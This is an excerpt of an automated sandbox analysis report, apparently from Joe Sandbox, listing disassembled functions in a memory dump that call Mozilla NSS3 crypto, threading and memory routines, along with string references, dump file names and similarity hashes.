PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C710D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C710D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C710D7D
free.MOZGLUE(00000000), ref: 6C710DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C710DC1
free.MOZGLUE(00000000), ref: 6C710DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C710E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C710E0F

Part of subcall function 6C6E95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C6C7F4A,00000000,?,00000000,00000000), ref: 6C6E95E0
Part of subcall function 6C6E95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C6C7F4A,00000000,?,00000000,00000000), ref: 6C6E95F5
Part of subcall function 6C6E95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C6E9609
Part of subcall function 6C6E95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6E961D
Part of subcall function 6C6E95C0: PK11_GetInternalSlot.NSS3 ref: 6C6E970B
Part of subcall function 6C6E95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C6E9756
Part of subcall function 6C6E95C0: PK11_GetIVLength.NSS3(?), ref: 6C6E9767
Part of subcall function 6C6E95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C6E977E
Part of subcall function 6C6E95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6E978E

Strings

*,ql, xrefs: 6C710C69, 6C710DE0, 6C710C80, 6C710C8B, 6C710CAF
*,ql, xrefs: 6C710DCC
-$ql, xrefs: 6C710C64

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID: *,ql$*,ql$-$ql
API String ID: 3136566230-3823721729
Opcode ID: 0caa1091073abeb743d6e4832fbd27bf8480b356e848cf9e8b74debf95a3fb88
Instruction ID: 566cdcc6c58f8074694051d087a55a03d787df486f0375c1cc6037afebf0febc
Opcode Fuzzy Hash: 0caa1091073abeb743d6e4832fbd27bf8480b356e848cf9e8b74debf95a3fb88
Instruction Fuzzy Hash: 2741E3B1905249ABEB009F64DD46BEF7A74EF0530CF180038E91567B41E735EA24CBEA

Function 6C706CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C7D1DE0,?), ref: 6C706CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C706D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C706D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C706D82
DER_GetInteger_Util.NSS3(?), ref: 6C706DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C706DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C706E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C706F19
PK11_DigestBegin.NSS3(00000000), ref: 6C706F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C706F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C707011
PK11_FreeSymKey.NSS3(00000000), ref: 6C707033
free.MOZGLUE(?), ref: 6C70703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C707060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C707087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7070AF

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: a78cb800a72f766b9e522845822398875e221b9e6f909c65af06759d2d753806
Instruction ID: 0a24b4fe6e4fadcf7baced61a45c28177c42ccd96461a82516ec3cc0772980a3
Opcode Fuzzy Hash: a78cb800a72f766b9e522845822398875e221b9e6f909c65af06759d2d753806
Instruction Fuzzy Hash: 92A1E7F17083009BEB009B24DE65B5A33D5EB8131CF248939ED19CBA81E775EA85C793

Function 6C6CAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C6AAB95,00000000,?,00000000,00000000,00000000), ref: 6C6CAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C6AAB95,00000000,?,00000000,00000000,00000000), ref: 6C6CAF39
PR_Unlock.NSS3(?,?,?,6C6AAB95,00000000,?,00000000,00000000,00000000), ref: 6C6CAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C6AAB95,00000000,?,00000000,00000000,00000000), ref: 6C6CAF69
TlsGetValue.KERNEL32 ref: 6C6CB06B
EnterCriticalSection.KERNEL32(?), ref: 6C6CB083
PR_Unlock.NSS3(?), ref: 6C6CB0A4
TlsGetValue.KERNEL32 ref: 6C6CB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C6CB0D9
PR_Unlock.NSS3 ref: 6C6CB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6CB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6CB182

Part of subcall function 6C6FFAB0: free.MOZGLUE(?,-00000001,?,?,6C69F673,00000000,00000000), ref: 6C6FFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C6CB177

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C6AAB95,00000000,?,00000000,00000000,00000000), ref: 6C6CB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C6AAB95,00000000,?,00000000,00000000,00000000), ref: 6C6CB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C6AAB95,00000000,?,00000000,00000000,00000000), ref: 6C6CB1C2

Part of subcall function 6C6F1560: TlsGetValue.KERNEL32(00000000,?,6C6C0844,?), ref: 6C6F157A
Part of subcall function 6C6F1560: EnterCriticalSection.KERNEL32(?,?,?,6C6C0844,?), ref: 6C6F158F
Part of subcall function 6C6F1560: PR_Unlock.NSS3(?,?,?,?,6C6C0844,?), ref: 6C6F15B2

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 34c06928f0e733bdd8da67212c88e19798907a35914d7af5ae0414b24afd6119
Instruction ID: 1f2de6adcffb9bb9aaeab5b2d06b095ea2e9d43be5b206fdc9f89b31e8708292
Opcode Fuzzy Hash: 34c06928f0e733bdd8da67212c88e19798907a35914d7af5ae0414b24afd6119
Instruction Fuzzy Hash: 1FA1E2B5E002059BEF009F64DC85AEE77B4EF45308F144039E919A7B12E731E959CBEA

Function 6C6C2C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?ll,?,6C6BE477,?,?,?,00000001,00000000,?,?,6C6C3F23,?), ref: 6C6C2C62
EnterCriticalSection.KERNEL32(0000001C,?,6C6BE477,?,?,?,00000001,00000000,?,?,6C6C3F23,?), ref: 6C6C2C76
PL_HashTableLookup.NSS3(00000000,?,?,6C6BE477,?,?,?,00000001,00000000,?,?,6C6C3F23,?), ref: 6C6C2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C6BE477,?,?,?,00000001,00000000,?,?,6C6C3F23,?), ref: 6C6C2C93

Part of subcall function 6C74DD70: TlsGetValue.KERNEL32 ref: 6C74DD8C
Part of subcall function 6C74DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C74DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C6BE477,?,?,?,00000001,00000000,?,?,6C6C3F23,?), ref: 6C6C2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C6BE477,?,?,?,00000001,00000000,?,?,6C6C3F23,?), ref: 6C6C2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C6BE477,?,?,?,00000001,00000000,?,?,6C6C3F23), ref: 6C6C2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C6BE477,?,?,?,00000001,00000000,?), ref: 6C6C2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C6BE477,?,?,?,00000001,00000000,?), ref: 6C6C2D4D
EnterCriticalSection.KERNEL32(?), ref: 6C6C2D61
PL_HashTableLookup.NSS3(?,?), ref: 6C6C2D71
PR_Unlock.NSS3(?), ref: 6C6C2D7E

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

Strings

#?ll, xrefs: 6C6C2C43

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?ll
API String ID: 2446853827-834172089
Opcode ID: be3b4a16187d85852cadf1d6522222b6d5aadeaea09840bbac74a81c09fe9274
Instruction ID: 8ec283203cfc15746b3d568ef630deaa32e3475e9a755987c6b7c8a8482401dd
Opcode Fuzzy Hash: be3b4a16187d85852cadf1d6522222b6d5aadeaea09840bbac74a81c09fe9274
Instruction Fuzzy Hash: 8051D6B5E00105ABDB109F24DC858AA77B8FF1A35CB148534ED1897B11E731ED68C7EA

Function 6C71AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C71ADB1

Part of subcall function 6C6FBE30: SECOID_FindOID_Util.NSS3(6C6B311B,00000000,?,6C6B311B,?), ref: 6C6FBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C71ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C71AE08

Part of subcall function 6C6FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7D18D0,?), ref: 6C6FB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C71AE25
PL_FreeArenaPool.NSS3 ref: 6C71AE63
PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C71AE4D

Part of subcall function 6C624C70: TlsGetValue.KERNEL32(?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624C97
Part of subcall function 6C624C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CB0
Part of subcall function 6C624C70: PR_Unlock.NSS3(?,?,?,?,?,6C623921,6C8014E4,6C76CC70), ref: 6C624CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C71AE93
PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C71AECC
PL_FreeArenaPool.NSS3 ref: 6C71AEDE
PL_FinishArenaPool.NSS3 ref: 6C71AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C71AEF5
PL_FinishArenaPool.NSS3 ref: 6C71AF16

Strings

security, xrefs: 6C71ADEE

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: f9fa8ee4343eda53c114ae7df9bb10545c4310a425ec033752b2842972362b10
Instruction ID: e25f5eb895d230c4b0734d2d51b2f8fb6a253fed95ef14dfe1e0a576d5dcfca1
Opcode Fuzzy Hash: f9fa8ee4343eda53c114ae7df9bb10545c4310a425ec033752b2842972362b10
Instruction Fuzzy Hash: DC41FAF1A0820067E7215B289E4ABAB32ACAF5232CF180535E81496F45FB39D75CC7D7

Function 6C7BAF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C769890: TlsGetValue.KERNEL32(?,?,?,6C7697EB), ref: 6C76989E

EnterCriticalSection.KERNEL32(?), ref: 6C7BAF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C7BAFCE
PR_SetPollableEvent.NSS3(?), ref: 6C7BAFD9
EnterCriticalSection.KERNEL32(?), ref: 6C7BAFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C7BB00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C7BB02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C7BB070
PR_JoinThread.NSS3(?), ref: 6C7BB07B
free.MOZGLUE(?), ref: 6C7BB084
EnterCriticalSection.KERNEL32(?), ref: 6C7BB09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C7BB0C4
PR_JoinThread.NSS3(?), ref: 6C7BB0F3
free.MOZGLUE(?), ref: 6C7BB0FC
PR_JoinThread.NSS3(?), ref: 6C7BB137
free.MOZGLUE(?), ref: 6C7BB140

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 33a06560a0253030e17e37147e9810fee97ff713462659c7c6d363812d56553e
Instruction ID: defae57bfa1a970600ce2a40e4d9a9601f3013146c007806afa4581d37e8f4bc
Opcode Fuzzy Hash: 33a06560a0253030e17e37147e9810fee97ff713462659c7c6d363812d56553e
Instruction Fuzzy Hash: CA9137B5900601DFCB10DF19D9C885ABBB1BF4935872985A9DC196BB22E732FC46CB90

Function 6C6B8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C6B8E22
EnterCriticalSection.KERNEL32(?), ref: 6C6B8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C6B8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C6B8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C6B8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6B8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C6B8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C6B8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C6B8F00
free.MOZGLUE(?), ref: 6C6B8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C6B8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C6B8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C6B8F5B
PR_Unlock.NSS3(?), ref: 6C6B8F72
PR_Unlock.NSS3(?), ref: 6C6B8F82

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: dc88c8d7746fb7c91236687d8da5529e958cb81fd8464e3f8e62319e6820a42f
Instruction ID: cfc6ab88c0b2e09e4048bbd2b74b52ada8fb37a62fa7cdb78ae24972178f0691
Opcode Fuzzy Hash: dc88c8d7746fb7c91236687d8da5529e958cb81fd8464e3f8e62319e6820a42f
Instruction Fuzzy Hash: 385128B2E002069FD7109F68CC889AAB7B9FF59358B14412AFC08BB710E731ED5687D5

Function 6C6DCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C6DCE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C6DCEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C6DCED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C6DCEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C6DCF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C6DCF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C6DCF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C6DCF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C6DCF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C6DCFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C6DCFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C6DCFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C6DCFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C6DD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C6DD021

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 97a92f993e359af6bcb7c4e2d3a761f2698f0ef8621d1bc8fc1e341f1bb0b3ec
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 67317671B5295027EF0D645A6C21FDE154B4BA730EF451038F90AE67C0FA85AB1706FD

Function 6C6EEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C6EEE0B

Part of subcall function 6C700BE0: malloc.MOZGLUE(6C6F8D2D,?,00000000,?), ref: 6C700BF8
Part of subcall function 6C700BE0: TlsGetValue.KERNEL32(6C6F8D2D,?,00000000,?), ref: 6C700C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6EEEE1

Part of subcall function 6C6E1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C6E1D7E
Part of subcall function 6C6E1D50: EnterCriticalSection.KERNEL32(?), ref: 6C6E1D8E
Part of subcall function 6C6E1D50: PR_Unlock.NSS3(?), ref: 6C6E1DD3

TlsGetValue.KERNEL32 ref: 6C6EEE51
EnterCriticalSection.KERNEL32(?), ref: 6C6EEE65
PR_Unlock.NSS3(?), ref: 6C6EEEA2
free.MOZGLUE(?), ref: 6C6EEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C6EEED0
PR_Unlock.NSS3(?), ref: 6C6EEF48
free.MOZGLUE(?), ref: 6C6EEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C6EEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C6EEFA4
free.MOZGLUE(?), ref: 6C6EEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C6EF055
free.MOZGLUE(?), ref: 6C6EF060

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 935d292fa545ba31dad78ae15aca64531c015586d93b039a49e801e2bde39ce8
Instruction ID: e7c3df467d5110c4943f96bb47e3d19cd09aaebf65d0f93377a47809f40bc114
Opcode Fuzzy Hash: 935d292fa545ba31dad78ae15aca64531c015586d93b039a49e801e2bde39ce8
Instruction Fuzzy Hash: 838190B1A05209ABDF00DFA4EC85BDE7BB5BF0D318F144025E919A3711E731E925CBA5

Function 6C6B4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C6B4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C6B4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C6B4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6B4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C6B4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C6B4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C6B4E85
DER_Encode_Util.NSS3(?,?,6C8005A4,00000000), ref: 6C6B4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C6B4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C6B4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6B4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6B4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6B4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6B4FC8

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 3f2f14a018df6e234c304441d33c05cb0aca1985c7bb417779c75552f10091b2
Instruction ID: 5e2fb83324e253f76ab7a89f213fa5f38cf49ecd3dcb2864646626b26dd7b37c
